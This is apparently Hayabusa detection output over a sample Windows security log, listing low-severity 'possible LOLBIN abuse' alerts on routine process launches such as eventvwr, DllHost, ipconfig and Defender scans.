7462016-08-31 03:26:31.346 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7472016-08-31 03:53:34.038 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7482016-08-31 03:53:34.114 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7492016-08-31 03:54:17.892 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7502016-08-31 03:54:17.934 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7512016-08-31 03:55:17.369 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7522016-08-31 03:55:17.405 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7532016-08-31 03:55:29.358 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-system.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7542016-08-31 03:55:29.420 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-system.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7552016-08-31 03:56:17.432 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7562016-08-31 03:56:17.468 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7572016-08-31 03:56:42.015 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7582016-08-31 03:56:42.074 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7592016-08-31 03:59:41.893 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7602016-08-31 03:59:41.954 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7612016-08-31 04:00:08.701 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7622016-08-31 04:00:08.738 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7632016-08-31 04:00:25.559 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7642016-08-31 04:00:25.615 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7652016-08-31 04:00:45.207 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7662016-08-31 04:00:45.252 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7672016-08-31 04:02:16.930 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7682016-08-31 04:02:16.995 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7692016-08-31 04:03:18.080 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7702016-08-31 04:03:18.108 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\win7-trial-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7712016-08-31 05:48:41.903 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7722016-08-31 05:49:01.091 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7732016-08-31 05:50:48.340 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7742016-08-31 05:51:10.630 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7752016-08-31 09:09:04.159 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7762016-08-31 09:09:04.174 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7772016-08-31 09:11:15.295 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7782016-08-31 09:11:16.100 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7792016-08-31 09:11:16.210 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7802016-08-31 09:11:29.568 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7812016-08-31 09:11:35.821 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7822016-08-31 09:12:06.943 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7832016-08-31 09:12:06.951 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7842016-09-02 00:54:06.516 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7852016-09-02 00:54:07.012 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7862016-09-02 00:54:07.725 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7872016-09-02 00:54:07.802 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7882016-09-02 00:54:09.426 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7892016-09-02 00:54:28.302 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7902016-09-02 01:12:27.928 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7912016-09-02 01:12:27.973 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7922016-09-02 01:18:44.431 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7932016-09-02 01:18:44.458 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\Win7-security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7942016-09-02 02:01:48.411 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7952016-09-02 02:01:48.594 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7962016-09-02 02:01:48.666 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7972016-09-02 02:03:48.398 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7982016-09-02 02:09:30.260 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7992016-09-02 02:09:39.134 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8002016-09-02 02:10:01.474 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8012016-09-02 02:26:02.115 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8022016-09-02 05:00:10.327 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8032016-09-02 05:05:18.971 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8042016-09-02 05:06:54.664 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
